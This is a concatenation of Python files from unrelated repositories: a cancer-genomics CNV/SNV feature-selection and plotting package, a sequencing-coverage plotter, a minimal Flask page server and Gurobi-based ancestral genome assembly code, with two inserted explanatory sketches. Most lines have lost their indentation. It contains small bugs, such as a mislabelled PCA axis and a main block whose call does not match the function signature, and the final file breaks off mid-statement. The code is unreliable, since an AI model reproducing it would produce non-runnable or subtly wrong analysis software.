def pheatmap(data, length, col_cluster=True, xticklabels=True, yticklabels=True, save="pdf", color=None, name=None):
data = z_score(data, axis=0)
if len(data.columns) > 30:
xticklabels = False
if len(data) > 80:
yticklabels = False
vmin, vmax = data.unstack().quantile([.01, .99])
    re = sns.clustermap(data, cmap="bwr", row_cluster=True, col_cluster=col_cluster, figsize=(13, 10), \
                        xticklabels=xticklabels, yticklabels=yticklabels, vmin=vmin, vmax=vmax, col_colors=color)
re.ax_heatmap.set_xticklabels(re.ax_heatmap.xaxis.get_majorticklabels(), rotation=90)
re.ax_heatmap.set_yticklabels(re.ax_heatmap.yaxis.get_majorticklabels(), rotation=0)
if col_cluster == False:
for group, number in length.items():
re.ax_col_colors.text((number[0] + number[1])/2 - len(group)/2, 1.1, group, size=30)
re.savefig(name + "." + save)
else:
re.savefig(name + "_col_cluster." + save)
plt.close()
def make_col_color_heatmap(group_dic):
common_color = ["blue", "red", "green", "grey"]
color = {}; length = {}
temp = 0
i = 0
for name, group in group_dic.items():
length[name] = [temp, temp + len(group)]
temp += len(group)
for sample in group:
color[sample] = common_color[i]
i += 1
color = pd.Series(color)
color.name = "group"
return color, length
def pca(data, group_dic, n=None):
pca = PCA(n_components=2)
group = []
length = OrderedDict()
temp = 0
for name, g in group_dic.items():
length[name] = [temp, temp + len(g)]
temp += len(g)
group += g
data = data[group]
newData = pca.fit_transform(data.T)
colors = ["blue", "red", "green", 'turquoise', "grey"]
i = 0
for name, number in length.items():
plt.scatter(newData[number[0]:number[1], 0], newData[number[0]:number[1], 1], label=name, color=colors[i])
i += 1
plt.title("PCA analysis")
pc1 = 100*pca.explained_variance_ratio_[0]
pc2 = 100*pca.explained_variance_ratio_[1]
plt.xlabel("PC1(%.1f)" % pc1)
plt.ylabel("PC1(%.1f)" % pc2)
plt.legend()
plt.savefig("PCA_%s.png" % n)
plt.close()
def plot_box(data, which, outname, palette, regulation, group):
fig, ax1 = plt.subplots(figsize=(8,12))
box_data = defaultdict(list)
if which == "cnv":
how = "mean"
for name, g in group.items():
box_data[name] = data[g].mean(0)
else:
how = "sum"
for name, g in group.items():
box_data[name] = data[g].sum(0)
data.to_csv(outname + "_box_data_%s_%s" % (regulation, how) + ".txt", sep="\t")
sns.boxplot(data=pd.DataFrame(box_data), ax=ax1, width=0.2, linewidth=.5, palette=palette)
ax1.set_title(outname)
ax1.set_ylabel('%s value(%s)' % (which, how))
fig.autofmt_xdate(ha='center', rotation=0)
fig.savefig(r'%s_box_data_%s_%s_Boxplot.png' % (outname, regulation, how), dpi=600, size=0.5)
plt.close()
def databox(raw, which, outname=None, group=None):
palette = {}
up = []; down = []
group1_data = raw[list(group.values())[0]]
group2_data = raw[list(group.values())[1]]
color = ["red", "green", "blue"]
for gene in raw.index:
if group1_data.ix[gene].sum() - group2_data.ix[gene].sum() >= 0:
up.append(gene)
else:
down.append(gene)
for i, (name, g) in enumerate(group.items()):
palette[name] = color[i]
plot_box(raw.ix[up], which, outname, palette, "up", group)
plot_box(raw.ix[down], which, outname, palette, "down", group)
def save_data_pdf(data, name, length, color, group_dic, which):
data.to_csv("%s.txt" % name, sep="\t")
length = {key.split("/")[-1]: value for key, value in length.items()}
group_dic = {key.split("/")[-1]: value for key, value in group_dic.items()}
pheatmap(data, length, col_cluster=True, color=color, name=name, save="png")
pheatmap(data, length, col_cluster=False, color=color, name=name, save="png")
pca(data, group_dic, n=name)
databox(data, which, outname=name, group=group_dic)
def save_parameters(args=None, which="cnv"):
pass
def make_result_folder(args=None, which="cnv", fun=None):
feature_genes = []; gene_lists = {}; color_length = {}
os.chdir(args.outdir)
i = datetime.datetime.now()
for two_group in itertools.combinations([args.group1, args.group2], 2):
target = two_group[0].split("/")[-1] + "_VS_" + two_group[1].split("/")[-1] + "_%s%s%s_%s%s" % (i.year, i.month, i.day, i.hour, i.minute)
try:
os.mkdir(target)
except FileExistsError:
sh.rm("-rf",target)
os.mkdir(target)
if which == "cnv":
name = "cnv_median_" + args.data_type
gene_list, a_group, b_group = fun(args.host_gene, two_group[0], two_group[1], data_type=args.data_type)
else:
if args.cal_type == "num":
name = "snv_number"
else:
name = "snv_mean"
gene_list, a_group, b_group = fun(args.host_gene, two_group[0], two_group[1], args.cal_type, which)
feature_gene = feature_select(gene_list, a_group, b_group, pval=args.pval, method=args.feature_selection_method,\
criterion=args.criterion, penalty=args.penalty, C=args.C, threshold=args.threshold)
feature_genes.append(feature_gene)
gene_lists[two_group[0]] = gene_list[a_group]; gene_lists[two_group[1]] = gene_list[b_group]
os.chdir(target)
save_parameters(args=args, which=which)
group_dic = {two_group[0]: a_group, two_group[1]: b_group}
color_length[two_group[0]] = a_group; color_length[two_group[1]] = b_group
color, length = make_col_color_heatmap(group_dic)
save_data_pdf(gene_list, "host_gene_%s" % name, length, color, group_dic, which)
pd.DataFrame({"gene":feature_gene}).to_csv("feature_gene_pval%0.2f.txt" % args.pval, sep="\t", index=False)
feature_gene_cnv = gene_list.ix[feature_gene]
evaluate_model(gene_list, a_group, b_group, feature_gene, name="feature_gene_%s" % name, method=args.prediction_method, C=args.C, n_folds=args.n_folds)
save_data_pdf(feature_gene_cnv, "feature_gene_%s" % name, length, color, group_dic, which)
os.chdir(args.outdir)
if len([args.group1, args.group2]) > 2:
try:
os.mkdir("intersection")
except FileExistsError:
pass
os.chdir("intersection")
color, length = make_col_color_heatmap(color_length)
intersection_feature_gene = list(set(feature_genes[0]).intersection(*feature_genes[1:]))
        intersection_feature_gene_cnv = pd.concat([data.ix[intersection_feature_gene] for _, data in gene_lists.items()], axis=1)
try:
            save_data_pdf(intersection_feature_gene_cnv, "intersection", length, color, color_length, which)
except Exception:
print("no intersection\njob finish...")
os.chdir(args.outdir)
```
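make_result_folder() above is driven entirely by a single args object. The namespace below is a hypothetical illustration that simply collects the attribute names referenced throughout core.py; the real values come from the package's command-line front end, which is not part of this file, and the exact types of group1/group2 depend on that caller.
```python
# Hypothetical args namespace for make_result_folder(); attribute names are
# taken from the args.* accesses in core.py, all values are placeholders.
from types import SimpleNamespace

args = SimpleNamespace(
    outdir="results/",                     # os.chdir target and output root
    group1="groupA",                       # first sample group (exact type depends on the caller)
    group2="groupB",                       # second sample group
    host_gene="target_gene.txt",           # host/target gene list file
    data_type="log2",                      # used when which == "cnv"
    cal_type="num",                        # used for SNV input (which != "cnv")
    pval=0.05,                             # p-value cutoff for feature selection
    feature_selection_method="LinearSVC",
    criterion="aic",
    penalty="l2",
    C=1,
    threshold=0,
    prediction_method="LinearSVC",
    n_folds=5,
)
# make_result_folder(args=args, which="cnv", fun=get_host_gene_cnv)  # illustrative call only
```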
#### File: genecast/genecast_package/cnv_analysis.py
```python
import pandas as pd
from glob import glob
import numpy as np
import os
from genecast_package.core import make_result_folder
from genecast_package.snv_analysis import get_host_gene
import warnings
warnings.filterwarnings("ignore")
class MethodException(Exception):
pass
def split_gene_data(data, data_type):
new_data = {"gene": [], data_type: []}
for genes, value in zip(data["gene"], data[data_type]):
for gene in genes.split(";"):
new_data["gene"].append(gene)
new_data[data_type].append(value)
data = pd.DataFrame(new_data)
return data
def parser_cnr(file, args=None):
data = pd.read_table(file, usecols=["gene", "log2"])
data = data.loc[data["gene"] != "Background"]
data = split_gene_data(data, args.data_type)
groups = pd.DataFrame(data.groupby(data["gene"]).median())
groups.columns = [file.split("/")[-1].split(".")[0]]
return groups
def parser_call_cnr(file, args=None):
data = pd.read_table(file, usecols=["gene", "log2", "cn"])
data = data.loc[data["gene"] != "Background"]
data = split_gene_data(data, args.data_type)
groups = pd.DataFrame(data[args.data_type].groupby(data["gene"]).median())
groups.columns = [file.split("/")[-1].split(".")[0]]
return groups
def get_host_gene_cnv(args=None):
gene_list = get_host_gene(args=args)
if args.data_type == "log2": fun = parser_cnr; fillna_num = 0
else: fun = parser_call_cnr; fillna_num = 2
a_group = []
for file in args.group1:
a_group.append(file.split("/")[-1].split(".")[0])
gene_list = pd.merge(gene_list, fun(file, args=args), left_on="gene", right_index=True, how="left").fillna(fillna_num)
b_group = []
for file in args.group2:
b_group.append(file.split("/")[-1].split(".")[0])
gene_list = pd.merge(gene_list, fun(file, args=args), left_on="gene", right_index=True, how="left").fillna(fillna_num)
gene_list.index = gene_list["gene"]
del gene_list["gene"]
# if 0 in gene_list.dropna(how="all").fillna(0):
# data = gene_list.dropna(how="all").fillna(0).drop(0, axis=0)
# else:
# data = gene_list.dropna(how="all").fillna(0)
if args.data_type == "log2": data = gene_list.loc[~(gene_list.T==0).all()]
else: data = gene_list.loc[~(gene_list.T==2).all()]
return data, a_group, b_group
def cnv(args=None):
make_result_folder(args=args, fun=get_host_gene_cnv, which="cnv")
if __name__ == "__main__":
host_gene_file = "target_gene.txt"
groups = ["CESC", "OV", "UCEC"]
p = 0.05
root_dir = os.getcwd()
make_result_folder(host_gene_file, groups, p, root_dir, fun=get_host_gene_cnv, which="cnv", \
prediction_method="LinearSVC", C=1, n_folds=5, criterion='aic', penalty="l2", alpha=0.025, threshold=0)
```
#### File: genecast/genecast_package/depth_coverage_plot.py
```python
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
import multiprocessing
import sh
import pysam
from collections import defaultdict
class TypeException(Exception):
pass
def bin(group, n):
depth = []
group = np.array(group)
for i in range(0, len(group), n):
depth.append(np.median(group[i:i + n]))
return np.log10(depth)
def plot(data, args=None, file=None):
fig, axs = plt.subplots(nrows=2, ncols=1,figsize=(15,12))
average_depth = data[args.type].mean()
percentage20 = len(data.loc[data[args.type] > average_depth * 0.2]) / len(data)
if args.type == "base": reads = bin(data[args.type], args.n)
else: reads = np.log10(data[args.type])
ax1, ax2 = axs[0], axs[1]
ax1.bar(np.arange(len(reads)), reads, 1, color="slateblue")
ax1.set_ylabel("$Log10(%s)$" % args.type, size=20)
#ax1.set_title("Uniformity of Coverage (Average Coverage = %d)" % (average_depth), size=20)
reads.sort()
ax2.bar(np.arange(len(reads)), reads, 1, color="slateblue")
ax2.set_ylabel("$Log10(%s)$" % args.type, size=20)
ax2.set_xticks([])
if args.type == "base":
ax1.set_xlabel("panel_loction(bin=%d)" % args.n, size=20)
ax2.set_xlabel("sort_depth(bin=%d)" % args.n, size=20)
ax1.set_title("Uniformity of Coverage (Average Coverage = %d percentage20 = %0.3f)" % (average_depth, percentage20), size=20)
else:
ax1.set_xlabel("panel_loction(bin=panel_region)", size=20)
ax2.set_xlabel("sort_depth(bin=panel_region)", size=20)
ax1.set_title("Uniformity of Coverage (Average reads of panel_region = %d percentage20 = %0.3f)" % (average_depth, percentage20), size=20)
plt.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9, hspace = 0.2, wspace = 0.3)
plt.savefig("%s_uniformity_coverage.png" % file.split(".")[0], dpi=600)
plt.close()
def multiprocessing_plot(file, args):
if args.type == "reads":
sam = pysam.AlignmentFile(file)
data = pd.read_table("%s" % args.panel, names=["chr", "start", "end", "gene", "transcript"])
data["reads"] = [sam.count(chr, start, end) / (end - start) for chr, start, end in zip(data["chr"], data["start"], data["end"])]
elif args.type == "base":
try:
data = pd.read_table(file.strip(".") + ".depth", names=["chr", "pos", "base"])
except:
re = sh.samtools("depth", file, "-b", "%s" % args.panel)
f = open(file.strip(".") + ".depth", "wb")
f.write(re.stdout); f.close()
data = pd.read_table(file.strip(".") + ".depth", names=["chr", "pos", "base"])
else:
raise TypeException("data type is wrong")
plot(data, args=args, file=file)
return np.log10(data[args.type])
def plot_coverage(args=None):
pool = multiprocessing.Pool(processes=args.progress)
box_data = {}
for file in args.bams:
box_data[file.split(".")[0]] = pool.apply_async(multiprocessing_plot, (file, args))
pool.close(); pool.join()
box_data = {key: value.get() for key, value in box_data.items()}
data = pd.DataFrame(box_data)
fig, ax1 = plt.subplots(figsize=(len(args.bams), 12))
sns.boxplot(data=data, ax=ax1, width=0.2, linewidth=.5)
ax1.set_title("Uniformity of Coverage")
ax1.set_ylabel("$Log10(%s)$" % args.type)
fig.autofmt_xdate(ha='center', rotation=0)
plt.xticks(rotation=90)
fig.savefig(r'%s_Uniformity_Boxplot.png' % (args.out), dpi=600)
plt.close()
``` |
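plot_coverage() likewise expects an args object. The attribute names in the sketch below are taken from the args.* accesses in depth_coverage_plot.py, but the flag spellings and the argparse wiring are assumptions, since the real CLI entry point is not included here.
```python
# Hypothetical argparse front end for plot_coverage(); attribute names match
# the args.* accesses above, flag names are assumptions.
import argparse

def build_parser():
    parser = argparse.ArgumentParser(description="coverage uniformity plots (sketch)")
    parser.add_argument("--bams", nargs="+", required=True,
                        help="BAM files to evaluate")
    parser.add_argument("--panel", required=True,
                        help="panel file with columns: chr, start, end, gene, transcript")
    parser.add_argument("--type", choices=["base", "reads"], default="reads",
                        help="per-base depth or per-region read counts")
    parser.add_argument("--n", type=int, default=100,
                        help="bin size, used only when --type is 'base'")
    parser.add_argument("--progress", type=int, default=4,
                        help="number of worker processes")
    parser.add_argument("--out", default="coverage",
                        help="prefix for the summary boxplot")
    return parser

# plot_coverage(build_parser().parse_args())  # illustrative call only
```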
{
"source": "863aditya/NEAR_DUPLICATE_DETECTION",
"score": 3
} |
#### File: ndd_1/flask/app.py
```python
from flask import Flask
from flask import render_template,request,redirect
app = Flask(__name__)
@app.route("/")
def root():
return render_template("p1.html")
@app.route("/p11")
def p11():
return render_template("p11.html")
@app.route("/p12")
def p12():
return render_template("p12.html")
@app.route("/p13")
def p13():
return render_template("p13.html")
@app.route("/p14")
def p14():
return render_template("p14.html")
@app.route("/p15")
def p15():
return render_template("p15.html")
@app.route("/p16")
def p16():
return render_template("p16.html")
@app.route("/p17")
def p17():
return render_template("p17.html")
@app.route("/p18")
def p18():
return render_template("p18.html")
@app.route("/p19")
def p19():
return render_template("p19.html")
@app.route("/p110")
def p110():
return render_template("p110.html")
@app.route("/p111")
def p111():
return render_template("p111.html")
@app.route("/p112")
def p112():
return render_template("p112.html")
if __name__=="__main__":
app.run(debug=True,port=5000)
``` |
{
"source": "865699871/IAGS_version1.0",
"score": 3
} |
#### File: IAGS_version1.0/dataSturcture/adjacencyMatrix.py
```python
import pandas as pd
import numpy as np
class AdjacencyMatrix:
def __init__(self):
self.adjacency_matrix =None
def readFromMatrix(self,adjacency_matrix):
self.adjacency_matrix = adjacency_matrix
def readFromFile(self,file):
self.adjacency_matrix = pd.read_csv(file, sep='\t', index_col=0,dtype=int)
def output(self,outfile):
self.adjacency_matrix.to_csv(outfile, sep='\t')
def __reverse(self,item):
if item[-1] == 'a':
return item[:-1] + 'b'
else:
return item[:-1] + 'a'
def assemble(self):
index = self.adjacency_matrix.index.tolist()
columns =self.adjacency_matrix.columns.tolist()
np_adjacency_matrix = np.asarray(self.adjacency_matrix)
adjacencies = {}
for i in range(len(index)):
for j in range(len(index)):
if round(np_adjacency_matrix[i][j]) == 1:
if '$' == index[i] or '$' == index[j]:
continue
pair = sorted([index[i], index[j]])
key = pair[0] + '@' + pair[1]
if key not in adjacencies.keys():
adjacencies[key] = 1
else:
adjacencies[key] += 1
adjs = {}
for i in adjacencies.keys():
itemset = i.split('@')
if itemset[0] not in adjs.keys():
adjs[itemset[0]] = itemset[1]
if itemset[1] not in adjs.keys():
adjs[itemset[1]] = itemset[0]
startpoint = []
for j in range(len(columns)):
if np_adjacency_matrix[0][j] == 1:
startpoint.append(columns[j])
markerstartpoint = []
self.chr = []
for i in startpoint:
if i not in markerstartpoint:
path = []
if i[-1] == 'a':
path.append(i[:-1])
else:
path.append('-' + i[:-1])
start = self.__reverse(i)
if start in startpoint:
markerstartpoint.append(start)
self.chr.append(path)
else:
while True:
next = adjs[start]
if next[-1] == 'a':
path.append(next[:-1])
else:
path.append('-' + next[:-1])
start = self.__reverse(next)
if start in startpoint:
markerstartpoint.append(start)
break
self.chr.append(path)
vector = []
for i in self.chr:
for j in i:
if j.startswith('-'):
vector.append(j[1:])
else:
vector.append(j)
cyclepoint = []
for i in adjs.keys():
if i[:-1] not in vector:
cyclepoint.append(i)
self.cyclechr = []
markercycle = []
for i in cyclepoint:
if i not in markercycle:
startpoint = i
cycle = []
markercycle.append(i)
start = i
while True:
next = adjs[start]
if next[-1] == 'a':
cycle.append(next[:-1])
else:
cycle.append('-' + next[:-1])
markercycle.append(start)
markercycle.append(next)
start = self.__reverse(next)
if start == startpoint:
break
self.cyclechr.append(cycle)
return self.chr,self.cyclechr
def out_assembly(self,outfile,remove_bar):
outfile = open(outfile, 'w')
print("string:"+str(len(self.chr)))
for i in self.chr:
outfile.write('s ')
for j in i:
if remove_bar:
block = j.split('_')[0]
outfile.write(block+' ')
else:
outfile.write(j + ' ')
outfile.write('\n')
print("cycle:"+str(len(self.cyclechr)))
for k in self.cyclechr:
outfile.write('c ')
min_index = -1
min_value = 1000000
for l in range(len(k)):
if k[l].startswith('-'):
item = k[l][1:].split('_')
block = int(item[0])
else:
item = k[l].split('_')
block = int(item[0])
if block < min_value:
min_index = l
min_value = block
if k[min_index].startswith('-'):
half1 = k[min_index + 1:]
half2 = k[:min_index + 1]
new_string = half1 + half2
else:
half1 = k[min_index:]
half2 = k[:min_index]
new_string = half1 + half2
for l in new_string:
if remove_bar:
block = l.split('_')[0]
outfile.write(block + ' ')
else:
outfile.write(l + ' ')
outfile.write('\n')
outfile.close()
```
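A short usage sketch of the AdjacencyMatrix API defined above: load an ancestral endpoint matrix, assemble it into linear and circular chromosomes, and write the block sequence. File paths are placeholders.
```python
# Usage sketch for AdjacencyMatrix (paths are placeholders).
from dataSturcture.adjacencyMatrix import AdjacencyMatrix

matrix = AdjacencyMatrix()
matrix.readFromFile("ancestor.matrix.xls")       # tab-separated endpoint adjacency matrix
linear, circular = matrix.assemble()             # linear chromosomes and circular fragments
print(len(linear), "linear chromosomes,", len(circular), "circular fragments")
matrix.out_assembly("ancestor.block", remove_bar=False)  # write the block sequence
```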
#### File: IAGS_version1.0/inferringAncestorGenomeStructure/EndpointMatchingOptimization.py
```python
import gurobipy as gp
from gurobipy import *
import pandas as pd
import numpy as np
from dataSturcture.adjacencyMatrix import AdjacencyMatrix
class EndpointMatchingOptimization:
def __init__(self,ancestor_file,guided_file,matching_dim1 = 4,matching_dim2 = 2,relation1 = 1,relation2 = 2,relabel=False):
self.__matching_dim1 = matching_dim1
self.__matching_dim2 = matching_dim2
self.__relation1 = relation1
self.__relation2 = relation2
self.__relabel_block_sequences = []
self.__relabel = relabel
ancestor_matrix = pd.read_csv(ancestor_file,sep='\t',index_col=0)
self.__ancestor_adjacency_list = self.__build_adjacency_list(ancestor_matrix)
self.__candidate_compress_adjacency_matrix, self.__candidate_endpoint_list = \
self.__build_assumed_matrix(self.__ancestor_adjacency_list)
if self.__relabel:
self.__guided_adjacency_list = self.__assumed_block_label(guided_file)
else:
self.__guided_adjacency_list = self.__build_adjacency_list_from_sequence(guided_file)
self.__guided_compress_adjacency_matrix, self.__guided_endpoint_list = \
self.__build_assumed_matrix(self.__guided_adjacency_list)
self.__match_pairs = []
for i in self.__candidate_compress_adjacency_matrix:
match_pair = []
adj1 = i[-1]
compare_key1 = ''
if adj1[0] != '$':
item = adj1[0].split('@')
compare_key1 += item[0]
if adj1[1] != '$':
item = adj1[1].split('@')
compare_key1 += item[0]
for j in self.__guided_compress_adjacency_matrix:
adj2 = j[-1]
compare_key2 = ''
if adj2[0] != '$':
item = adj2[0].split('@')
compare_key2 += item[0]
if adj2[1] != '$':
item = adj2[1].split('@')
compare_key2 += item[0]
if compare_key1 == compare_key2:
match_pair.append(j)
self.__match_pairs.append([i, match_pair])
self.__k = int((len(self.__candidate_endpoint_list) - 1) / (self.__matching_dim1))
def optimization(self):
try:
self.__m = gp.Model()
match_matrix = self.__m.addVars(self.__k,
self.__matching_dim1,
self.__matching_dim2,
vtype=GRB.BINARY,
name="matching_matrix")
self.__m.update()
self.__m.setObjective(gp.quicksum(
(i[0][2] * match_matrix[int(i[0][0] / (self.__matching_dim1)),
i[0][0] % self.__matching_dim1,
j[0] % self.__matching_dim2] + (1 - i[0][2])) *
(i[0][3] * match_matrix[int(i[0][1] / (self.__matching_dim1)),
i[0][1] % self.__matching_dim1,
j[1] % self.__matching_dim2] + 1 - i[0][3])
for i in self.__match_pairs for j in i[1]
), GRB.MAXIMIZE)
self.__m.addConstrs((
gp.quicksum(match_matrix[i, j, l] for l in range(self.__matching_dim2)) == self.__relation1
for i in range(self.__k)
for j in range(self.__matching_dim1)), name='row_unique'
)
self.__m.addConstrs((
gp.quicksum(match_matrix[i, l, j] for l in range(self.__matching_dim1)) == self.__relation2
for i in range(self.__k)
for j in range(self.__matching_dim2)), name='col_unique'
)
self.__m.optimize()
print('Obj: %g' % self.__m.objVal)
except gp.GurobiError as e:
print('Error code ' + str(e.errno) + ': ' + str(e))
except AttributeError:
print('Encountered an attribute error')
def matching_relation(self):
result = []
for v in self.__m.getVars():
result.append(v.x)
result = np.asarray(result)
result = result.reshape((self.__k, self.__matching_dim1, self.__matching_dim2))
self.__match_relations = {}
for i in range(len(result)):
column = []
index = []
for j in range(self.__matching_dim2):
item = self.__candidate_endpoint_list[i * self.__matching_dim2 + 1].split('@')
column.append(item[0] + '@' + str(j + 1))
for j in range(self.__matching_dim1):
item = self.__candidate_endpoint_list[i * self.__matching_dim2 + 1].split('@')
index.append(item[0] + '@' + str(j + 1))
match = pd.DataFrame(result[i], columns=column, index=index)
match_relation = match.to_dict()
for j in match_relation.keys():
for k in match_relation[j].keys():
item = k.split('@')
if match_relation[j][k] == 1:
self.__match_relations[k] = j
def output_matching_relation(self,outfile):
outfile = open(outfile, 'w')
for i in self.__match_relations.keys():
line = i + ' ' + self.__match_relations[i]
line += '\n'
outfile.write(line)
outfile.close()
def build_adjacency_matrix(self):
new_adjacency_list = []
for i in self.__ancestor_adjacency_list:
new_adjacency = []
for j in i:
if j == '$':
new_adjacency.append('$')
else:
new_adjacency.append(self.__match_relations[j])
new_adjacency_list.append(new_adjacency)
new_result_Matrix = {}
for i in self.__candidate_endpoint_list:
if i == '$':
key1 = '$'
else:
item1 = i.split('@')
key1 = item1[0][:-1] + '_' + item1[1] + item1[0][-1]
new_result_Matrix[key1] = {}
for j in self.__candidate_endpoint_list:
if j == '$':
key2 = '$'
else:
item2 = j.split('@')
key2 = item2[0][:-1] + '_' + item2[1] + item2[0][-1]
new_result_Matrix[key1][key2] = 0
for i in new_adjacency_list:
if i[0] == '$':
key1 = '$'
else:
item1 = i[0].split('@')
key1 = item1[0][:-1] + '_' + item1[1] + item1[0][-1]
if i[1] == '$':
key2 = '$'
else:
item2 = i[1].split('@')
key2 = item2[0][:-1] + '_' + item2[1] + item2[0][-1]
new_result_Matrix[key1][key2] = 1
new_result_Matrix[key2][key1] = 1
new_result_Matrix = pd.DataFrame(new_result_Matrix)
self.adjacency_matrix = AdjacencyMatrix()
self.adjacency_matrix.readFromMatrix(new_result_Matrix)
return self.adjacency_matrix
def __build_adjacency_list(self,ancestor_matrix):
blocks_index = ancestor_matrix.columns.tolist()
blocks_matrix = np.asarray(ancestor_matrix)
endpoint_count = {}
for i in blocks_index:
endpoint_count[i] = 1
process_adjacency = []
adjacency_list = []
for i in range(len(blocks_matrix)):
for j in range(len(blocks_matrix[i])):
pair1 = blocks_index[i]
pair2 = blocks_index[j]
key = [pair1, pair2]
key = sorted(key)
key = key[0] + '@' + key[1]
if key not in process_adjacency:
process_adjacency.append(key)
else:
continue
if round(blocks_matrix[i][j]) != 0:
for k in range(int(round(blocks_matrix[i][j]))):
if pair1 == '$' and pair2 == '$':
adjacency_list.append([pair1, pair2])
elif pair1 == '$' and pair2 != '$':
adjacency_list.append([pair1, pair2 +'@'+ str(endpoint_count[pair2])])
endpoint_count[pair2] += 1
elif pair1 != '$' and pair2 == '$':
adjacency_list.append([pair1 +'@'+ str(endpoint_count[pair1]), pair2])
endpoint_count[pair1] += 1
else:
adjacency_list.append(
[pair1 +'@'+ str(endpoint_count[pair1]), pair2 +'@'+ str(endpoint_count[pair2])])
endpoint_count[pair1] += 1
endpoint_count[pair2] += 1
return adjacency_list
def __build_adjacency_list_from_sequence(self,file):
adjacency_list = []
with open(file,'r') as df:
while True:
line = df.readline()[:-2]
if not line:
break
itemset = line.split(' ')
chr_type = itemset[0]
new_block_order = itemset[1:]
last = ''
start = ''
for i in range(len(new_block_order)):
if i == 0:
if chr_type == 's':
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
adjacency_list.append(['$', block + 'b' + '@' + copy_number])
last = block + 'a' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
adjacency_list.append(['$', block + 'a' + '@' + copy_number])
last = block + 'b' + '@' + copy_number
else:
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
last = block + 'a' + '@' + copy_number
start = block + 'b' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
last = block + 'b' + '@' + copy_number
start = block + 'a' + '@' + copy_number
else:
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
adjacency_list.append([last, block + 'b' + '@' + copy_number])
last = block + 'a' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
adjacency_list.append([last, block + 'a' + '@' + copy_number])
last = block + 'b' + '@' + copy_number
if chr_type == 's':
adjacency_list.append([last, '$'])
else:
adjacency_list.append([last, start])
return adjacency_list
def __assumed_block_label(self,file):
adjacency_list = []
block_objects = {}
relabel_block_order = []
with open(file) as df:
while True:
line = df.readline()[:-2]
if not line:
break
itemset = line.split(' ')
chr_type = itemset[0]
new_block_order = []
for i in itemset[1:]:
block = ''
if i.startswith('-'):
block = i[1:]
if block not in block_objects.keys():
block_objects[block] = 1
new_block = '-' + block + '_' + str(block_objects[block])
block_objects[block] += 1
else:
new_block = '-' + block + '_' + str(block_objects[block])
block_objects[block] += 1
else:
block = i
if block not in block_objects.keys():
block_objects[block] = 1
new_block = block + '_' + str(block_objects[block])
block_objects[block] += 1
else:
new_block = block + '_' + str(block_objects[block])
block_objects[block] += 1
new_block_order.append(new_block)
last = ''
start = ''
for i in range(len(new_block_order)):
if i == 0:
if chr_type == 's':
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
adjacency_list.append(['$', block + 'b' + '@' + copy_number])
last = block + 'a' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
adjacency_list.append(['$', block + 'a' + '@' + copy_number])
last = block + 'b' + '@' + copy_number
else:
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
last = block + 'a' + '@' + copy_number
start = block + 'b' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
last = block + 'b' + '@' + copy_number
start = block + 'a' + '@' + copy_number
else:
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
adjacency_list.append([last, block + 'b' + '@' + copy_number])
last = block + 'a' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
adjacency_list.append([last, block + 'a' + '@' + copy_number])
last = block + 'b' + '@' + copy_number
if chr_type == 's':
adjacency_list.append([last, '$'])
else:
adjacency_list.append([last, start])
relabel_block_order.append([chr_type] + new_block_order)
return adjacency_list
def __build_assumed_matrix(self,adjacency_list):
endpoint_list = []
for i in adjacency_list:
for j in i:
if j not in endpoint_list:
endpoint_list.append(j)
endpoint_list = sorted(endpoint_list)
adjacency_matrix = {}
for i in endpoint_list:
adjacency_matrix[i] = {}
for j in endpoint_list:
adjacency_matrix[i][j] = 0
for i in adjacency_list:
adjacency_matrix[i[0]][i[1]] += 1
adjacency_matrix[i[1]][i[0]] += 1
adjacency_matrix = pd.DataFrame(adjacency_matrix)
adjacency_matrix = np.asarray(adjacency_matrix)
compress_adjacency_matrix = []
for i in range(len(adjacency_matrix)):
for j in range(len(adjacency_matrix[i])):
if round(adjacency_matrix[i][j]) != 0:
for k in range(adjacency_matrix[i][j]):
adjacency = [endpoint_list[i], endpoint_list[j]]
adjacency = sorted(adjacency)
if adjacency[0] == endpoint_list[i] and adjacency[1] == endpoint_list[j]:
if i == 0 and j == 0:
compress_adjacency_matrix.append([i, j, 0, 0, adjacency])
if i == 0 and j != 0:
compress_adjacency_matrix.append([i, j - 1, 0, 1, adjacency])
if i != 0 and j == 0:
compress_adjacency_matrix.append([i - 1, j, 1, 0, adjacency])
if i != 0 and j != 0:
compress_adjacency_matrix.append([i - 1, j - 1, 1, 1, adjacency])
if adjacency[0] == endpoint_list[j] and adjacency[1] == endpoint_list[i]:
if i == 0 and j == 0:
compress_adjacency_matrix.append([j, i, 0, 0, adjacency])
if i == 0 and j != 0:
compress_adjacency_matrix.append([j - 1, i, 1, 0, adjacency])
if i != 0 and j == 0:
compress_adjacency_matrix.append([j, i - 1, 0, 1, adjacency])
if i != 0 and j != 0:
compress_adjacency_matrix.append([j - 1, i - 1, 1, 1, adjacency])
return compress_adjacency_matrix, endpoint_list
```
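A hedged usage sketch of EndpointMatchingOptimization: it requires a working gurobipy installation, an ancestral endpoint matrix and a guided block-sequence file. The paths and the dimension/relation values below are placeholders chosen to mirror the constructor defaults.
```python
# Usage sketch for EndpointMatchingOptimization (requires gurobipy; paths are placeholders).
from inferringAncestorGenomeStructure.EndpointMatchingOptimization import EndpointMatchingOptimization

emo = EndpointMatchingOptimization(
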